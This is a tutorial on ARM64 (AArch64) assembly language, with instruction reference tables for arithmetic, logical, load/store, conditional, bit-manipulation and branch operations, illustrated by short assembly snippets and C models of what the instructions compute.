ADRP Xd, rel Form PC-relative address to 4KB page adds an immediate value that is shifted left by 12 bits, to the PC value to form a PC-relative address, with the bottom 12 bits masked out, and writes the result to the destination register.
CMN (extended register) Rn, Rm{, extend {#amount}} Compare Negative (extended register) adds a register value and a sign or zero-extended register value, followed by an optional left shift amount. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMN (immediate) Rn, #imm{, shift} Compare Negative (immediate) adds a register value and an optionally-shifted immediate value. It updates the condition flags based on the result, and discards the result.
CMN (shifted register) Rn, Rm{, shift #amount} Compare Negative (shifted register) adds a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result.
CMP (extended register) Rn, Rm{, extend {#amount}} Compare (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword. It updates the condition flags based on the result, and discards the result.
CMP (immediate) Rn, #imm{, shift} Compare (immediate) subtracts an optionally-shifted immediate value from a register value. It updates the condition flags based on the result, and discards the result.
CMP (shifted register) Rn, Rm{, shift #amount} Compare (shifted register) subtracts an optionally-shifted register value from a register value. It updates the condition flags based on the result, and discards the result.
MADD Rd, Rn, Rm, ra Multiply-Add multiplies two register values, adds a third register value, and writes the result to the destination register.
MNEG Rd, Rn, Rm Multiply-Negate multiplies two register values, negates the product, and writes the result to the destination register. Alias of MSUB.
MSUB Rd, Rn, Rm, ra Multiply-Subtract multiplies two register values, subtracts the product from a third register value, and writes the result to the destination register.
MUL Rd, Rn, Rm Multiply. Alias of MADD.
NEG{S} Rd, op2 Negate (shifted register) negates an optionally-shifted register value, and writes the result to the destination register.
NGC{S} Rd, Rm Negate with Carry negates the sum of a register value and the value of NOT (Carry flag), and writes the result to the destination register.
SBC{S} Rd, Rn, Rm Subtract with Carry subtracts a register value and the value of NOT (Carry flag) from a register value, and writes the result to the destination register.
{U|S}DIV Rd, Rn, Rm Unsigned/Signed Divide divides an unsigned or signed integer register value by another unsigned or signed integer register value, and writes the result to the destination register. The condition flags are not affected.
{U|S}MADDL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Add Long multiplies two 32-bit register values, adds a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MNEGL Xd, Wn, Wm Unsigned/Signed Multiply-Negate Long multiplies two 32-bit register values, negates the product, and writes the result to the 64-bit destination register.
{U|S}MSUBL Xd, Wn, Wm, Xa Unsigned/Signed Multiply-Subtract Long multiplies two 32-bit register values, subtracts the product from a 64-bit register value, and writes the result to the 64-bit destination register.
{U|S}MULH Xd, Xn, Xm Unsigned/Signed Multiply High multiplies two 64-bit register values, and writes bits[127:64] of the 128-bit result to the 64-bit destination register.
{U|S}MULL Xd, Wn, Wm Unsigned/Signed Multiply Long multiplies two 32-bit register values, and writes the result to the 64-bit destination register.
SUB{S} (extended register) Rd, Rn, Rm{, extend {#amount}} Subtract (extended register) subtracts a sign or zero-extended register value, followed by an optional left shift amount, from a register value, and writes the result to the destination register. The argument that is extended from the Rm register can be a byte, halfword, word, or doubleword.
SUB{S} (immediate) Rd, Rn, #imm{, shift} Subtract (immediate) subtracts an optionally-shifted immediate value from a register value, and writes the result to the destination register.
SUB{S} (shifted register) Rd, Rn, Rm{, shift #amount} Subtract (shifted register) subtracts an optionally-shifted register value from a register value, and writes the result to the destination register.

  // x0 == -1?
  cmn     x0, 1
  beq     minus_one

  // x0 == 0
  cmp     x0, 0
  beq     zero

  // allocate 32 bytes of stack
  sub     sp, sp, 32

  // x0 = x0 % 37
  mov     x1, 37
  udiv    x2, x0, x1
  msub    x0, x2, x1, x0

  // x0 = 0
  sub     x0, x0, x0
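
Since A64 has no remainder instruction, the modulo example above relies on the udiv/msub pair. Here is a rough C model of what those two instructions compute; the function names are mine, and the zero-divisor behaviour (UDIV returns 0 instead of trapping) is stated from the architecture manual rather than from the listing above.

```c
#include <assert.h>
#include <stdint.h>

/* UDIV Xd, Xn, Xm: unsigned divide. A zero divisor yields 0, no trap. */
uint64_t udiv64(uint64_t n, uint64_t m) {
    return m == 0 ? 0 : n / m;
}

/* MSUB Xd, Xn, Xm, Xa: Xd = Xa - (Xn * Xm). */
uint64_t msub64(uint64_t n, uint64_t m, uint64_t a) {
    return a - n * m;
}

/* x % d expressed as the two-instruction sequence from the listing. */
uint64_t umod64(uint64_t x, uint64_t d) {
    assert(d != 0);                 /* remainder by zero is left undefined here */
    uint64_t q = udiv64(x, d);      /* udiv x2, x0, x1     */
    return msub64(q, d, x);         /* msub x0, x2, x1, x0 */
}
```

With x = 100 and d = 37, the quotient is 2 and the result is 100 - 2 * 37 = 26.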

2.2 Logical and Move

Mainly used for bit testing and manipulation. To a large degree, cryptographic algorithms use these operations exclusively to be efficient in both hardware and software. Implementing bitwise operations in hardware is relatively cheap.

Mnemonic Operands Instruction
AND{S} (immediate) Rd, Rn, #imm Bitwise AND (immediate) performs a bitwise AND of a register value and an immediate value, and writes the result to the destination register.
AND{S} (shifted register) Rd, Rn, Rm{, shift #amount} Bitwise AND (shifted register) performs a bitwise AND of a register value and an optionally-shifted register value, and writes the result to the destination register.
ASR (register) Rd, Rn, Rm Arithmetic Shift Right (register) shifts a register value right by a variable number of bits, shifting in copies of its sign bit, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
ASR (immediate) Rd, Rn, #imm Arithmetic Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in copies of the sign bit in the upper bits and zeros in the lower bits, and writes the result to the destination register.
BIC{S} Rd, Rn, Rm Bitwise Bit Clear (shifted register) performs a bitwise AND of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
EON Rd, Rn, Rm{, shift #amount} Bitwise Exclusive OR NOT (shifted register) performs a bitwise Exclusive OR NOT of a register value and an optionally-shifted register value, and writes the result to the destination register.
EOR Rd, Rn, #imm Bitwise Exclusive OR (immediate) performs a bitwise Exclusive OR of a register value and an immediate value, and writes the result to the destination register.
EOR Rd, Rn, Rm Bitwise Exclusive OR (shifted register) performs a bitwise Exclusive OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
LSL (register) Rd, Rn, Rm Logical Shift Left (register) shifts a register value left by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is left-shifted. Alias of LSLV.
LSL (immediate) Rd, Rn, #imm Logical Shift Left (immediate) shifts a register value left by an immediate number of bits, shifting in zeros, and writes the result to the destination register. Alias of UBFM.
LSR (register) Rd, Rn, Rm Logical Shift Right (register) shifts a register value right by a variable number of bits, shifting in zeros, and writes the result to the destination register. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted.
LSR Rd, Rn, #imm Logical Shift Right (immediate) shifts a register value right by an immediate number of bits, shifting in zeros, and writes the result to the destination register.
MOV (register) Rd, Rn Move (register) copies the value in a source register to the destination register. Alias of ORR.
MOV (immediate) Rd, #imm Move (wide immediate) moves a 16-bit immediate value to a register. Alias of MOVZ.
MOVK Rd, #imm{, shift #amount} Move wide with keep moves an optionally-shifted 16-bit immediate value into a register, keeping other bits unchanged.
MOVN Rd, #imm{, shift #amount} Move wide with NOT moves the inverse of an optionally-shifted 16-bit immediate value to a register.
MOVZ Rd, #imm{, shift #amount} Move wide with zero moves an optionally-shifted 16-bit immediate value to a register.
MVN Rd, Rm{, shift #amount} Bitwise NOT writes the bitwise inverse of a register value to the destination register. Alias of ORN.
ORN Rd, Rn, Rm{, shift #amount} Bitwise OR NOT (shifted register) performs a bitwise (inclusive) OR of a register value and the complement of an optionally-shifted register value, and writes the result to the destination register.
ORR Rd, Rn, #imm Bitwise OR (immediate) performs a bitwise (inclusive) OR of a register value and an immediate value, and writes the result to the destination register.
ORR Rd, Rn, Rm{, shift #amount} Bitwise OR (shifted register) performs a bitwise (inclusive) OR of a register value and an optionally-shifted register value, and writes the result to the destination register.
ROR Rd, Rs, #shift Rotate right (immediate) provides the value of the contents of a register rotated by an immediate number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. Alias of EXTR.
ROR Rd, Rn, Rm Rotate Right (register) provides the value of the contents of a register rotated by a variable number of bits. The bits that are rotated off the right end are inserted into the vacated bit positions on the left. The remainder obtained by dividing the second source register by the data size defines the number of bits by which the first source register is right-shifted. Alias of RORV.
TST Rn, #imm Test bits (immediate), setting the condition flags and discarding the result. Alias of ANDS.
TST Rn, Rm{, shift #amount} Test (shifted register) performs a bitwise AND operation on a register value and an optionally-shifted register value. It updates the condition flags based on the result, and discards the result. Alias of ANDS.
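
Because every instruction is 32 bits wide, a 64-bit constant has to be built 16 bits at a time with the move-wide instructions. The following C functions are only a sketch of what MOVZ, MOVK and MOVN compute; the function names simply mirror the mnemonics.

```c
#include <assert.h>
#include <stdint.h>

/* MOVZ Xd, #imm16, LSL #shift: place imm16, zero every other bit. */
uint64_t movz(uint16_t imm16, unsigned shift) {
    assert(shift == 0 || shift == 16 || shift == 32 || shift == 48);
    return (uint64_t)imm16 << shift;
}

/* MOVK Xd, #imm16, LSL #shift: replace one 16-bit slice, keep the rest. */
uint64_t movk(uint64_t xd, uint16_t imm16, unsigned shift) {
    assert(shift == 0 || shift == 16 || shift == 32 || shift == 48);
    uint64_t mask = (uint64_t)0xFFFF << shift;
    return (xd & ~mask) | ((uint64_t)imm16 << shift);
}

/* MOVN Xd, #imm16, LSL #shift: the bitwise inverse of what MOVZ gives. */
uint64_t movn(uint16_t imm16, unsigned shift) {
    return ~movz(imm16, shift);
}
```

Loading 0x12345678 therefore takes a movz for 0x5678 followed by a movk for 0x1234 shifted left by 16, and movn with an immediate of zero is a one-instruction way to load -1.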

Multiplication can be performed using logical shift left LSL. Division can be performed using logical shift right LSR. Modulo operations can be performed using bitwise AND. The only condition is that the multiplier and divisor be a power of two. The first three examples shown here demonstrate those operations.

  // x1 = x0 / 8
  lsr     x1, x0, 3

  // x1 = x0 * 4
  lsl     x1, x0, 2

  // x1 = x0 % 16
  and     x1, x0, 15

  // x0 == 0?
  tst     x0, x0
  beq     zero

  // x0 = 0
  eor     x0, x0, x0
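
The first three examples can be checked against ordinary arithmetic with a few lines of C. This is a sketch for unsigned values only, and all of the helper names are my own.

```c
#include <assert.h>
#include <stdint.h>

/* Non-zero when v is a power of two. */
int is_pow2(uint64_t v) {
    return v != 0 && (v & (v - 1)) == 0;
}

/* log2 of a power of two, i.e. the shift amount to use. */
unsigned log2_pow2(uint64_t v) {
    assert(is_pow2(v));
    unsigned n = 0;
    while ((v >>= 1) != 0) n++;
    return n;
}

/* x * m as lsl, x / d as lsr, x % d as and (m and d are powers of two). */
uint64_t mul_pow2(uint64_t x, uint64_t m) { return x << log2_pow2(m); }
uint64_t div_pow2(uint64_t x, uint64_t d) { return x >> log2_pow2(d); }
uint64_t mod_pow2(uint64_t x, uint64_t d) {
    assert(is_pow2(d));
    return x & (d - 1);
}
```

For signed values the right shift would have to be arithmetic (ASR), and the result rounds towards negative infinity rather than towards zero, so the equivalence with division only holds for non-negative inputs.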

2.3 Load, Store and Addressing Modes

The following are the main instructions used for loading and storing data. There are others of course, designed for privileged/unprivileged loads, unscaled/unaligned loads, atomicity, and exclusive registers. However, as a beginner these are the only ones you need to worry about for now.

Mnemonic Operands Instruction
LDR (B|H|SB|SH|SW) Wt, [Xn|SP], #simm Load Register (immediate) loads a word or doubleword from memory and writes it to a register. The address that is used for the load is calculated from a base register and an immediate offset.
LDR (B|H|SB|SH|SW) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Load Register (register) calculates an address from a base register value and an offset register value, loads a byte/half-word/word from memory, and writes it to a register. The offset register value can optionally be shifted and extended.
STR (B|H) Wt, [Xn|SP], #simm Store Register (immediate) stores a word or a doubleword from a register to memory. The address that is used for the store is calculated from a base register and an immediate offset.
STR (B|H) Wt, [Xn|SP, (Wm|Xm){, extend {amount}}] Store Register (register) calculates an address from a base register value and an offset register value, and stores a byte/half-word/word from a register to the calculated address. The offset register value can optionally be shifted and extended.
LDP Wt1, Wt2, [Xn|SP], #imm Load Pair of Registers calculates an address from a base register value and an immediate offset, loads two 32-bit words or two 64-bit doublewords from memory, and writes them to two registers.
STP Wt1, Wt2, [Xn|SP], #imm Store Pair of Registers calculates an address from a base register value and an immediate offset, and stores two 32-bit words or two 64-bit doublewords to the calculated address, from two registers
  // load a byte from x1
  ldrb    w0, [x1]

  // load a signed byte from x1
  ldrsb   w0, [x1]

  // store a 32-bit word to address in x1
  str     w0, [x1]

  // load two 32-bit words from stack, advance sp by 8
  ldp     w0, w1, [sp], 8

  // store two 64-bit words at [sp-96] and subtract 96 from sp 
  stp     x0, x1, [sp, -96]!

  // load 32-bit immediate from literal pool
  ldr     w0, =0x12345678

Addressing Mode                 Immediate      Register                                          Extended Register
Base register only (no offset)  [base{, 0}]    -                                                 -
Base plus offset                [base{, imm}]  [base, Xm{, LSL imm}]                             [base, Wm, (S|U)XTW {#imm}]
Pre-indexed                     [base, imm]!   -                                                 -
Post-indexed                    [base], imm    [base], Xm (SIMD structure loads and stores only)  -
Literal (PC-relative)           label          -                                                 -

Base register only

  // load a byte from x1
  ldrb   w0, [x1]

  // load a half-word from x1
  ldrh   w0, [x1]

  // load a word from x1
  ldr    w0, [x1]

  // load a doubleword from x1
  ldr    x0, [x1]

Base register plus offset

  // load a byte from x1 plus 1
  ldrb   w0, [x1, 1]

  // load a half-word from x1 plus 2
  ldrh   w0, [x1, 2]

  // load a word from x1 plus 4
  ldr    w0, [x1, 4]

  // load a doubleword from x1 plus 8
  ldr    x0, [x1, 8]

  // load a doubleword from x1 using x2 as index
  // x2 is multiplied by 8
  ldr    x0, [x1, x2, lsl 3]

  // load a doubleword from x1 using w2 as index
  // w2 is zero-extended and multiplied by 8
  ldr    x0, [x1, w2, uxtw 3]
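
The address calculation for the register-offset forms can be written out in C. This is a sketch only; the ea_* function names are hypothetical, and the SXTW variant is included for comparison even though the listing above only shows LSL and UXTW.

```c
#include <assert.h>
#include <stdint.h>

/* [base, Xm, LSL #shift]: 64-bit index scaled by a power of two. */
uint64_t ea_reg_lsl(uint64_t base, uint64_t xm, unsigned shift) {
    assert(shift <= 4);
    return base + (xm << shift);
}

/* [base, Wm, UXTW #shift]: 32-bit index, zero-extended, then scaled. */
uint64_t ea_reg_uxtw(uint64_t base, uint32_t wm, unsigned shift) {
    assert(shift <= 4);
    return base + ((uint64_t)wm << shift);
}

/* [base, Wm, SXTW #shift]: 32-bit index, sign-extended, then scaled. */
uint64_t ea_reg_sxtw(uint64_t base, uint32_t wm, unsigned shift) {
    assert(shift <= 4);
    return base + ((uint64_t)(int64_t)(int32_t)wm << shift);
}
```

The difference between UXTW and SXTW only shows up when bit 31 of the index is set: 0xFFFFFFFF is a large positive offset with UXTW and -1 with SXTW.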

Pre-index

The exclamation mark “!” means the offset is added to the base register before the load or store, and the updated address is written back to the base register.

  // advance x1 by 1, then load a byte from the updated x1
  ldrb   w0, [x1, 1]!

  // advance x1 by 2, then load a half-word from the updated x1
  ldrh   w0, [x1, 2]!

  // advance x1 by 4, then load a word from the updated x1
  ldr    w0, [x1, 4]!

  // advance x1 by 8, then load a doubleword from the updated x1
  ldr    x0, [x1, 8]!

Post-index

This mode accesses the value first and then adds the offset to base.

  // load a byte from x1, then advance x1 by 1
  ldrb   w0, [x1], 1

  // load a half-word from x1, then advance x1 by 2
  ldrh   w0, [x1], 2

  // load a word from x1, then advance x1 by 4
  ldr    w0, [x1], 4

  // load a doubleword from x1, then advance x1 by 8
  ldr    x0, [x1], 8
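
The two write-back modes differ only in when the base register is updated, much like *++p and *p++ in C. A small sketch, with ldr_w_pre and ldr_w_post as made-up names and the base register modelled as a byte pointer:

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* ldr w0, [x1, imm]! : update the base first, then load from it. */
uint32_t ldr_w_pre(const uint8_t **base, int64_t imm) {
    assert(base != NULL && *base != NULL);
    uint32_t value;
    *base += imm;
    memcpy(&value, *base, sizeof value);
    return value;
}

/* ldr w0, [x1], imm : load from the base first, then update it. */
uint32_t ldr_w_post(const uint8_t **base, int64_t imm) {
    assert(base != NULL && *base != NULL);
    uint32_t value;
    memcpy(&value, *base, sizeof value);
    *base += imm;
    return value;
}
```

Starting with the base pointing at an array of words, a post-indexed load with an offset of 4 returns element 0 and leaves the base at element 1; a pre-indexed load with the same offset then returns element 2.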

Literal (PC-relative)

These instructions work similarly to RIP-relative addressing on AMD64.

  // load address of label
  adr    x0, label

  // load address of the 4KB page that contains label
  adrp   x0, label
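
ADRP only yields a page address, so it is normally paired with an add of the low 12 bits (written :lo12:label in GNU assembler syntax). The arithmetic can be sketched in C as follows; all function names here are my own.

```c
#include <assert.h>
#include <stdint.h>

/* ADR Xd, label: Xd = PC + offset, where the offset is within +/-1MB. */
uint64_t adr_result(uint64_t pc, int64_t offset) {
    assert(offset >= -(1 << 20) && offset < (1 << 20));
    return pc + (uint64_t)offset;
}

/* Page delta an assembler or linker would encode for ADRP. */
int64_t adrp_page_delta(uint64_t pc, uint64_t target) {
    return (int64_t)(target >> 12) - (int64_t)(pc >> 12);
}

/* ADRP Xd, label: Xd = (PC with low 12 bits cleared) + (delta << 12). */
uint64_t adrp_result(uint64_t pc, int64_t page_delta) {
    return (pc & ~(uint64_t)0xFFF) + ((uint64_t)page_delta << 12);
}

/* Low 12 bits added by the follow-up add instruction. */
uint64_t lo12(uint64_t target) {
    return target & 0xFFF;
}
```

With the PC at 0x400123 and a label at 0x412345, ADRP produces 0x412000 and adding the low 12 bits (0x345) gives the full address.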

2.4 Conditional

These instructions select between the first or second source register, depending on the current state of the condition flags. When the named condition is true, the first source register is selected and its value is copied without modification to the destination register. When the condition is false the second source register is selected and its value might be optionally inverted, negated, or incremented by one, before writing to the destination register.

CSEL is essentially like the ternary operator in C. Probably my favorite instruction of ARM64 since it can be used to replace two or more opcodes.

Mnemonic Operands Instruction
CCMN (immediate) Rn, #imm, #nzcv, cond Conditional Compare Negative (immediate) sets the value of the condition flags to the result of the comparison of a register value and a negated immediate value if the condition is TRUE, and an immediate value otherwise.
CCMN (register) Rn, Rm, #nzcv, cond Conditional Compare Negative (register) sets the value of the condition flags to the result of the comparison of a register value and the inverse of another register value if the condition is TRUE, and an immediate value otherwise.
CCMP (immediate) Rn, #imm, #nzcv, cond Conditional Compare (immediate) sets the value of the condition flags to the result of the comparison of a register value and an immediate value if the condition is TRUE, and an immediate value otherwise.
CCMP (register) Rn, Rm, #nzcv, cond Conditional Compare (register) sets the value of the condition flags to the result of the comparison of two registers if the condition is TRUE, and an immediate value otherwise.
CSEL Rd, Rn, Rm, cond Conditional Select returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register.
CSINC Rd, Rn, Rm, cond Conditional Select Increment returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the value of the second source register incremented by 1. Used by CINC and CSET.
CSINV Rd, Rn, Rm, cond Conditional Select Invert returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the bitwise inversion value of the second source register. Used by CINV and CSETM.
CSNEG Rd, Rn, Rm, cond Conditional Select Negation returns, in the destination register, the value of the first source register if the condition is TRUE, and otherwise returns the negated value of the second source register. Used by CNEG.
CSET Rd, cond Conditional Set sets the destination register to 1 if the condition is TRUE, and otherwise sets it to 0.
CSETM Rd, cond Conditional Set Mask sets all bits of the destination register to 1 if the condition is TRUE, and otherwise sets all bits to 0.
CINC Rd, Rn, cond Conditional Increment returns, in the destination register, the value of the source register incremented by 1 if the condition is TRUE, and otherwise returns the value of the source register.
CINV Rd, Rn, cond Conditional Invert returns, in the destination register, the bitwise inversion of the value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
CNEG Rd, Rn, cond Conditional Negate returns, in the destination register, the negated value of the source register if the condition is TRUE, and otherwise returns the value of the source register.
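
The whole family boils down to a handful of ternary expressions. The following C sketch models the four base instructions and shows how some of the aliases could be expressed through them with the condition inverted; the function names just mirror the mnemonics.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* The four base instructions: pick Rn, or a modified Rm. */
uint64_t csel(bool cond, uint64_t rn, uint64_t rm)  { return cond ? rn : rm; }
uint64_t csinc(bool cond, uint64_t rn, uint64_t rm) { return cond ? rn : rm + 1; }
uint64_t csinv(bool cond, uint64_t rn, uint64_t rm) { return cond ? rn : ~rm; }
uint64_t csneg(bool cond, uint64_t rn, uint64_t rm) { return cond ? rn : 0 - rm; }

/* Aliases: same instruction, inverted condition, zero or repeated source. */
uint64_t cset(bool cond)              { return csinc(!cond, 0, 0); }
uint64_t csetm(bool cond)             { return csinv(!cond, 0, 0); }
uint64_t cinc(bool cond, uint64_t rn) { return csinc(!cond, rn, rn); }
uint64_t cneg(bool cond, uint64_t rn) { return csneg(!cond, rn, rn); }

/* A few sanity checks that double as usage examples. */
void conditional_select_examples(void) {
    assert(csel(true, 1, 2) == 1);
    assert(cset(true) == 1 && cset(false) == 0);
    assert(csetm(true) == UINT64_MAX);
    assert(cinc(true, 5) == 6);
}
```

For instance, x0 = (x1 == x2) ? 1 : 0 becomes a cmp followed by cset x0, eq, with no branch at all.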

Let’s consider the following if statement.

if (c == 0 && x == y) {
  // body of if statement
}

If the first condition evaluates to true (c equals zero), only then is the second condition evaluated. To implement the above statement in assembly, one could use the following.

    cmp    c, 0
    bne    false

    cmp    x, y
    bne    false
true:
    // body of if statement
false:
    // end of if statement

We could eliminate one instruction using conditional execution on ARMv7-A. Consider using the following instead.

    cmp    c, 0
    cmpeq  x, y
    bne    false

To improve performance of AArch64, ARM removed support for conditional execution and replaced it with specialised instructions such as the conditional compare instructions. Using ARMv8-A, the following can be used.

    cmp    c, 0
    ccmp   x, y, 0, eq
    bne    false

    // conditions are true:
false:

The ternary operator can be used for the same if statement.

bEqual = (c == 0) ? (x == y) : 0; 

If cmp c, 0 sets the Z flag (c equals zero), ccmp x, y performs the second comparison and sets the flags from it; otherwise the flags are loaded from the immediate operand, and 0 clears Z so the bne is taken. Other conditions require different flags. Each flag is set using 1, 2, 4 or 8 (V, C, Z and N respectively). Combine these values to set multiple flags. I’ve defined the flags below and also each condition required for a branch.

    .equ FLAG_V, 1
    .equ FLAG_C, 2
    .equ FLAG_Z, 4
    .equ FLAG_N, 8

    .equ NE, 0
    .equ EQ, FLAG_Z

    .equ GT, 0
    .equ GE, FLAG_Z

    .equ LT, (FLAG_N + FLAG_C)
    .equ LE, (FLAG_N + FLAG_Z + FLAG_C)

    .equ HI, (FLAG_N + FLAG_C)          // unsigned version of GT
    .equ HS, (FLAG_N + FLAG_Z + FLAG_C) // unsigned version of GE

    .equ LO, 0                        // unsigned version of LT
    .equ LS, FLAG_Z                   // unsigned version of LE
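To make the behaviour of the conditional compare concrete, here is a rough C model. It assumes 64-bit operands and reuses the FLAG_* values defined above; cmp_flags, ccmp_flags and both_equal are hypothetical helper names, not part of any toolchain.

```c
#include <stdbool.h>
#include <stdint.h>

enum { FLAG_V = 1, FLAG_C = 2, FLAG_Z = 4, FLAG_N = 8 };

/* Flags produced by "cmp a, b", i.e. a - b with the result discarded. */
unsigned cmp_flags(uint64_t a, uint64_t b)
{
    uint64_t r = a - b;
    unsigned f = 0;

    if (r >> 63)                    f |= FLAG_N;  /* result is negative   */
    if (r == 0)                     f |= FLAG_Z;  /* operands are equal   */
    if (a >= b)                     f |= FLAG_C;  /* no borrow occurred   */
    if (((a ^ b) & (a ^ r)) >> 63)  f |= FLAG_V;  /* signed overflow      */
    return f;
}

/* "ccmp a, b, nzcv, cond": compare only if cond holds,
   otherwise load the flags from the 4-bit immediate. */
unsigned ccmp_flags(bool cond, uint64_t a, uint64_t b, unsigned nzcv)
{
    return cond ? cmp_flags(a, b) : (nzcv & 0xF);
}

/* if (c == 0 && x == y):  cmp c, 0 ; ccmp x, y, 0, eq ; bne false */
bool both_equal(uint64_t c, uint64_t x, uint64_t y)
{
    unsigned f = cmp_flags(c, 0);
    f = ccmp_flags((f & FLAG_Z) != 0, x, y, 0);
    return (f & FLAG_Z) != 0;
}
```

The immediate only matters when the first comparison fails, so it should be chosen to make the final branch condition false.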

2.5 Bit Manipulation

Most of these instructions are intended to extract or move bits from one register to another. They tend to be useful when working with bytes or words where the contents of the destination register need to be preserved, zero-extended or sign-extended.

Mnemonic Operands Instruction
BFI Rd, Rn, #lsb, #width Bitfield Insert copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, leaving other bits unchanged.
BFM Rd, Rn, #immr, #imms Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, leaving other bits unchanged.
BFXIL Rd, Rn, #lsb, #width Bitfield extract and insert at low end copies any number of low-order bits from a source register into the same number of adjacent bits at the low end in the destination register, leaving other bits unchanged.
CLS Rd, Rn Count leading sign bits.
CLZ Rd, Rn Count leading zero bits.
EXTR Rd, Rn, Rm, #lsb Extract register extracts a register from a pair of registers.
RBIT Rd, Rn Reverse Bits reverses the bit order in a register.
REV16 Rd, Rn Reverse bytes in 16-bit halfwords reverses the byte order in each 16-bit halfword of a register.
REV32 Rd, Rn Reverse bytes in 32-bit words reverses the byte order in each 32-bit word of a register.
REV64 Rd, Rn Reverse Bytes reverses the byte order in a 64-bit general-purpose register.
SBFIZ Rd, Rn, #lsb, #width Signed Bitfield Insert in Zero zeroes the destination register and copies any number of contiguous bits from a source register into any position in the destination register, sign-extending the most significant bit of the transferred value. Alias of SBFM.
SBFM Wd, Wn, #immr, #imms Signed Bitfield Move copies any number of low-order bits from a source register into the same number of adjacent bits at any position in the destination register, shifting in copies of the sign bit in the upper bits and zeros in the lower bits.
SBFX Rd, Rn, #lsb, #width Signed Bitfield Extract extracts any number of adjacent bits at any position from a register, sign-extends them to the size of the register, and writes the result to the destination register.
{S,U}XT{B,H,W} Rd, Rn (S)igned/(U)nsigned eXtend (B)yte/(H)alfword/(W)ord extracts an 8-bit, 16-bit or 32-bit value from a register, sign- or zero-extends it to the size of the register, and writes the result to the destination register. Alias of SBFM or UBFM.
    // Move 0x12345678 into w0.
    mov     w0, 0x5678
    mov     w1, 0x1234
    bfi     w0, w1, 16, 16

    // Extract 8-bits from x1 into the x0 register at position 0.
    // If x1 is 0x12345678, 0x00000056 is placed in x0.
    ubfx    x0, x1, 8, 8

    // Take the low 8 bits of x1 and insert them into a zeroed x0 at position 8.
    // If x1 is 0x12345678, 0x00007800 is placed in x0.
    ubfiz   x0, x1, 8, 8
    
    // Extract 8-bits from x1 and insert into x0 at position 0.
    // if x1 is 0x12345678 and x0 is 0x09ABCDEF. x0 after execution has 0x09ABCD78
    bfxil   x0, x1, 0, 8
    
    // Clear lower 8 bits.
    bfxil   x0, xzr, 0, 8

    // Zero-extend 8-bits (UXTB only has a 32-bit form; writing w0 also clears the upper half of x0)
    uxtb    w0, w0
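
For readers who find the bitfield instructions easier to follow as shifts and masks, here is a rough C model of the 64-bit forms used above. The function names mirror the mnemonics but are only illustrative, and the sketch assumes lsb is below 64 and width is between 1 and 64.

```c
#include <stdint.h>

/* Mask with the low 'width' bits set; width is 1..64. */
uint64_t low_mask(unsigned width)
{
    return width >= 64 ? ~(uint64_t)0 : (((uint64_t)1 << width) - 1);
}

/* ubfx Xd, Xn, lsb, width: extract a field and zero-extend it. */
uint64_t ubfx(uint64_t xn, unsigned lsb, unsigned width)
{
    return (xn >> lsb) & low_mask(width);
}

/* ubfiz Xd, Xn, lsb, width: place the low 'width' bits of xn
   at position 'lsb' in an otherwise zeroed register. */
uint64_t ubfiz(uint64_t xn, unsigned lsb, unsigned width)
{
    return (xn & low_mask(width)) << lsb;
}

/* bfi Xd, Xn, lsb, width: like ubfiz, but the other bits of xd survive. */
uint64_t bfi(uint64_t xd, uint64_t xn, unsigned lsb, unsigned width)
{
    uint64_t mask = low_mask(width) << lsb;
    return (xd & ~mask) | ((xn << lsb) & mask);
}

/* bfxil Xd, Xn, lsb, width: extract a field from xn and insert it
   at the low end of xd, leaving the other bits of xd unchanged. */
uint64_t bfxil(uint64_t xd, uint64_t xn, unsigned lsb, unsigned width)
{
    uint64_t mask = low_mask(width);
    return (xd & ~mask) | ((xn >> lsb) & mask);
}
```

The "extract" variants read from position lsb in the source, while the "insert" variants write to position lsb in the destination; that is the only difference between UBFX and UBFIZ.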

2.6 Branch

Branch instructions change the flow of execution using the condition flags or value of a general-purpose register. Branches are referred to as “jumps” in x86 assembly.

Mnemonic Operands Instruction
B label Branch causes an unconditional branch to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
B.cond label Branch conditionally to a label at a PC-relative offset, with a hint that this is not a subroutine call or return.
BL label Branch with Link branches to a PC-relative offset, setting the register X30 to PC+4. It provides a hint that this is a subroutine call.
BLR Xn Branch with Link to Register calls a subroutine at an address in a register, setting register X30 to PC+4.
BR Xn Branch to Register branches unconditionally to an address in a register, with a hint that this is not a subroutine return.
CBNZ Rn, label Compare and Branch on Nonzero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect the condition flags.
CBZ Rn, label Compare and Branch on Zero compares the value in a register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
RET Xn Return from subroutine branches unconditionally to an address in a register, with a hint that this is a subroutine return.
TBNZ Rn, #imm, label Test bit and Branch if Nonzero compares the value of a bit in a general-purpose register with zero, and conditionally branches to a label at a PC-relative offset if the comparison is not equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.
TBZ Rn, #imm, label Test bit and Branch if Zero compares the value of a test bit with zero, and conditionally branches to a label at a PC-relative offset if the comparison is equal. It provides a hint that this is not a subroutine call or return. This instruction does not affect condition flags.

